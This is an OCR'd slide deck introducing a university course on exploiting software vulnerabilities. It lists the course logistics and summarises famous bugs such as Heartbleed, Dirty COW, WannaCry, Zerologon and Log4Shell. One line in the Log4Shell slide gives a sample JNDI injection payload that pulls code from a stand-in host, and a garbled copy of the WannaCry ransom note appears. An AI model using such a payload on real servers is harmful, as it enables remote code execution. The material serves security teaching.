Exploiting Software Vulnerabilities Course introduction

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Dept. of Computer Science and Systems Engineering University of Zaragoza, Spain

Course 2023/2024

Master's Degree in Informatics Engineering

University of Zaragoza Room A.02, Ada Byron building



Outline

1 Course Description





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2 Motivation



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Instructors

Ricardo J. Rodríguez, PhD

- Research lines:
 - Program binary analysis
 - Digital forensics
 - Formal analysis of complex systems (performance, dependability, survivability)
- Member of the DisCo group, PI in the research line on application of formal models to cybersecurity
 - Visit our webpage to learn more about our research: https://www.reversea.me
 - We post security-related news on Telegram and Twitter follow us ⁽²⁾!

https://t.me/reverseame/https://twitter.com/reverseame

- Office D0.08 D0.05, Ada Byron building
- Office hours:
 - Tue: 12.00-14.00; Wed: 17.00-19.00; Fri: 14.00-16.00 book yourself at http://bit.ly/citas-RJRodriguez
 - Teaching calendar available at http://bit.ly/calendario-RJRodriguez
 - Email me to book other time slots (rjrodriguez@unizar.es)



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Universidad

Instructors Teaching Assistants (for laboratory sessions)



Razvan Raducu razvan@unizar.es



Daniel Uroz duroz@unizar.es



General Course Description

Exploiting Software Vulnerabilities (*Explotación de vulnerabilidades en sistemas software*)

- Optional course in Master's Degree in Informatics Engineering. 3 ECTS
- Course code: 62240
- Course guide:
 - SPA: https://sia.unizar.es/documentos/doa/guiadocente/2023/62240_es.pdf
- Moodle: https://moodle.unizar.es/add/course/view.php?id=78633
 - Point of contact for discussions, announcements, and task deliveries
- All the teaching material is available in:
 - https://webdiis.unizar.es/~ricardo/esv-62240/

- G. Recognize the most common vulnerabilities in software systems
- Evaluate the security of a software system
- G3. Mastering different software systems analysis techniques
- Create proofs of concept that allow compromising the security of vulnerable software systems



Syllabus Theory sessions

- Introduction: vulnerability management, types of vulnerabilities, tools and analysis lab. Ethical concerns
- **Program binary analysis**: static analysis, dynamic analysis
- Software vulnerabilities and exploitation techniques: integers, format strings, memory errors (in heap, in stack)
- Software defenses: exploitation mitigation techniques
- Advanced exploitation techniques: custom shellcode design, Windows shellcoding, ROP attacks

TTT Universidad

Syllabus Laboratory sessions

- (Sep 18) Process Memory Maps
- ICCC 16, 23) Vulnerability analysis: Integer Overflows and Format String
- (Nov 13, 20) Vulnerability analysis: Stack-based and Heap-based OF
- (Dec 11, 18) Code-Reuse Attacks in Windows

- Room A.02, Ada Byron building¹
- Debian 9 (OVA file): for sessions 1, 2, and 3
- Windows 7 (OVA file): for session 4
 - Use VirtualBox (or your preferred hypervisor) to deploy and run them

¹We can look into alternatives if you are unable to use a personal laptop for the course. Course introduction [CC BY-NC-SA 4.0 © R.J. Rodríguez] 2023/2024 9 / 32

Evaluation

Concept	<i>Grade (</i> ∈ [0, 10])
Laboratory: mandatory workbook submission	G _{lab}
Assignments: small research project to be presented in the	G _{students} , G _{profs}
classroom, evaluated by peers and the instructors. An eval-	
uation spreadsheet will be provided.	

$$0.7 \cdot G_{lab} + 0.15 \left(G_{students} + G_{profs}
ight)$$

Laboratory works are individual works

Assignment works can be done in groups or individually

Minimum grade of 5 to pass

The grade of a part is kept between consecutive calls (same academic year)

Examination day

- Jan 11, 2024 (first call); Jun 18, 2024 (second call)
- Afternoon session (specific time TBA)



What should you already know?

■ Be fluent in programming (the lower, the better)

We are going to work with the C programming language

Know the basics of computer architecture

What elements make up a CPU, how a processor works, what is the stack and its purpose, etc.

Know assembly language

- We will work with Intel x86 assembly
- Additional material to be provided soon!

ATTENTION!

Please complete the questionnaire form provided in Moodle

It is anonymous

- Only to evaluate the degree of learning achieved throughout the course
- Takes around 30 minutes to complete



Bibliography

Check the URL in Roble UZ at this link

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- Hacking : the art of exploitation / Jon Erickson. 2nd ed., 20th printing San Francisco : No Starch Press, cop. 2008
- Buffer Overflow Attacks: Detect, Exploit, Prevent / James C. Foster, Vitaly Osipov, Nish Bhalla, Niels Heinen. Syngress, Jan 29, 2005
- Writing Security Tools and Exploits / James C. Foster, Vincent Liu. Syngress, 2006
- A Bug Hunter's Diary / T. Klein. No Starch Press, 2011
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- Bug Bounty Automation With Python: The secrets of bug hunting / Syed Abuthahir, 2020. ISBN-13 : 979-8676655990
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- The shellcoder's handbook : discovering and exploiting security holes / Jack Koziol ... [et al.].
 Indianapolis : Wiley, cop. 2004
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- Reverse Engineering for Beginners, Dennis Yurichev, https://beginners.re/

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Motivation Classical definition of security





Recap on security attributes

Confidentiality Information is not accessed by unauthorized persons

Access control or encryption mechanisms

Integrity Information is not altered by unauthorized persons in an undetectable way by authorized users

Access control or checksum mechanisms

Availability Reliable (and timely) access and use of information, while preventing unauthorized retention of information

Authenticity Users are the people they claim to be

Authorization What is the information that an authenticated user can access, or what are the operations that they can perform?

■ Non-repudiation, Accountability, Privacy, Anonymity, ...



Motivation Software security: challenges

Software artifacts are complex



Software flaws and bugs \Rightarrow vulnerabilities (exploited by attackers)



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Motivation FACT: Software errors are expensive

http://youtu.be/PK_yguLapgA?t=50s

- Ariane 5 first test flight (1996)
- European Space Agency
- Few seconds after launch, it abruptly changes course and triggers a self-destruct mechanism
 - Numerical error by overflow: converting data from a 64-bit floating point to a 16-bit signed integer value
 - "The failure of the Ariane 501 was caused by the complete loss of guidance and attitude information 37 seconds after start of the main engine ignition sequence (30 seconds after lift- off). This loss of information was due to specification and design errors in the software of the inertial reference system"

(http://www-users.math.umn.edu/~arnold/disasters/ariane5rep.html)

More info at https://around.com/ariane.html



Motivation FACT: Software vulnerabilities are valuable

Unintended vs. intended

Exploit: taking advantage of a software flaw

Detect bugs and communicate them to vendors!

Bug bounty programs

Check https://bugcrowd.com/list-of-bug-bounty-programs!

HEARTBLEED



CVE-2014-0160

- Bug on OpenSSL cryptography library
- Improper input validation (missing bounds check) in the implementation of TLS heartbeat extension
- Buffer over-read: arbitrary data may be read



SHELLSHOCK (aka Bashdoor)



CVE-2014-6271

- Bug on Bash shell
- Unintentionally command execution when commands are concatenated to the end of function definitions stored in values of environment variables
- Several related vulnerabilities (CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, and CVE-2014-7187)



Credits: https://en.wikipedia.org/wiki/Shellshock_(software_bug) Course introduction [CC BY-NC-SA 4.0 © R.J. Rodríguez]

DIRTY COW



CVE-2016-5195

- Linux kernel vulnerability
- Local privilege escalation, exploits a race condition in the implementation of the copy-on-write mechanism in the kernel's memory-management subsystem
- Can be used to root any Android device (up to Android 7)



Credits: https://en.wikipedia.org/wiki/Dirty_COW Course introduction [CC BY-NC-SA 4.0 @ R.J. Rodríguez]



CVE-2017-5753, CVE-2017-5715

- Affects to modern microprocessors that perform branch prediction
- Speculative execution:
 - A branch misprediction may leave observable side effects that may reveal private data
- Remote exploitation by malicious web pages (i.e., JavaScript)
- It falls on the domain of side-channel attacks. Out of scope here!



Remarkable bugs in recent years

Meltdown



CVE-2017-5754

- Hardware vulnerability (Intel x86, IBM POWER, and some ARM-based microprocessors)
- A rogue process may read all memory, even when it is not authorized to do so
- Race condition between memory access and privilege checking during instruction processing
 - Combined with a cache side-channel attack, an unauthorized process may read data from any address that is mapped to the current process's memory space
 - Recall that any OSes map physical memory, kernel processes, and other running user space processes into the address space of every process

Credits: https://en.wikipedia.org/wiki/Meltdown_(security_vulnerability)

SAMBA PROTOCOL

Ooops, your files have been encrypted! Code: What Happened to My Computer?	~
What Happened to My Computer?	
Your important files are encrypted. Many of your documents, phono, videos, datahases and other files are no longer inconsible because they have been encrypted. Mayles you are busy looking for a wa precover your files, but do not waste your time. Nobody can recover your files witho and encryption service.	ra Na
Can I Recover My Files?	
Sure. We quarantee that you can recover all your files safely and easily. But you have not to enough time. You can decrypt nones of your files for fire. Try, new by clicking «Decrypt». Easily you want to decrypt all your (Files you need to pay. You only haw 3 days to subshift the payment. After that the price will be doubled. Abu, flyou don't pay in 7 days, you win't be able to neareer your files forever.	
This will have these events for users who are so poor that they couldn't pay is 6 most How Do I Pay? Payment is accepted in Biccuis only. For more information, click - About biccuis. Phase theke the current price of Biccuis and bay reme bitceins. For more informat dirk: Afters to bay biccuis. And send the current amount to the address specified in this visidew. And yeard the current amount to the address specified in this visidew.	ы. Ion,
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CVE-2017-7494

Remote code execution in Samba protocol

- Known after the widely spreading of the ransom-worm WannaCry
 - EternalBlue as spreading mechanism. Patched on March 14, 2017 (MS17-010)
 - DoublePulsar as local privilege escalation
 - Initial outbreak: May 12, 2017 do the maths, folks



Credits: https://nakedsecurity.sophos.com/ Course introduction [CC BY-NC-SA 4.0 @ R.J. Rodríguez]

ROCA

CVE-2017-15361



- Cryptographic weakness that allows the private key of a key pair to be recovered from the public key
- Error in RSA key generation used in the RSAlib software library, from Infineon
 - Incorporated in many smart cards and Trusted Platform Module (TPM) implementations



Credits: https://en.wikipedia.org/wiki/ROCA_vulnerability Course introduction [CC BY-NC-SA 4.0 © R.J. Rodríguøz]



CVE-2019-0708

Microsoft Remote Desktop Protocol

- Heap corruption
- "Wormable" remote code execution
- Occurrs when a server binds a specific virtual channel (used internally by MS RPC as a data path between a client and a server) with a static channel other than 31
- Windows 2000 through Windows Server 2008 R2 and Windows 7



Credits: https://en.m.wikipedia.org/wiki/BlueKeep Course introduction [CC BY-NC-SA 4.0 © R.J. Rodríguez]

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Remarkable bugs in recent years

Zerologon: CVE-2020-1472

- Vulnerability in the cryptographic authentication scheme used by the Netlogon Remote Protocol
- Critical vulnerability
- Remote elevation of privileges
 - Specially crafted authentication token for specific Netlogon functionality, the attacker can update computer passwords to impersonate any computer and even execute remote procedure calls on its behalf



Credits: https://www.secura.com/blog/zero-logon

Remarkable bugs in recent years

CVE-2021-1675 / CVE-2021-34527 (PrintNightmare)

■ CVE-2021-1675: local privilege escalation

- Authentication bypass vulnerability found in the AddPrinterDriverEx function
- Allows any authenticated user to install a local (or remote) printer driver
- Microsoft Windows Print Spooler service loads the driver right after installing.
- Attacker can install any malicious payload in the system
- CVE-2021-34527: remote code execution vulnerability

Allows attackers to remotely inject DLLs

An authenticated domain user can remotely escalate and gain SYSTEM privileges



Remarkable bugs in recent years

PROXYLOGON



CVE-2021-26855

- Vulnerability in MS Exchange Server
- Bypass the authentication and impersonate as the admin
- Just one of many vulnerabilities that can lead to other attacks (in fact, to one rewarded with a \$200K bounty...)
- Chained with two previous bugs:
 - CVE-2021-26855: Pre-auth SSRF leads to Authentication Bypass
 - CVE-2021-27065: Post-auth Arbitrary-File-Write leads to RCE
- Apparently, it was being used by an APT group in the wild



Credits: https://proxylogon.com/



CVE-2021-44228

■ Remote code execution on log4j

- Open source software
- Maintained by the Apache Software Foundation
- Commonly used for logging management

Exploits published from 1-day on

- An specially crafted HTTP request to the server triggers the vulnerability
 - For instance, in the User-Agent field
 - E.g.: \${jndi:ldap://evil.xa/file}
- More details:

https://en.wikipedia.org/wiki/Log4Shell



Credits: https://threatpost.com/log4shell-targeted-vmware-data/180072/

Ethical notes

Disclaimer

- Nothing in this course is intended as incitement to crack into running systems or licensed software
- Breaking into systems (or software) can lead to prosecution
- Did you detect a security vulnerability?
 - Communicate with sysadmins or vendors confidentially
- Play with your own machine (or your own private network of machines)
 - And, of course, enjoy learning and practicing! <a>li>



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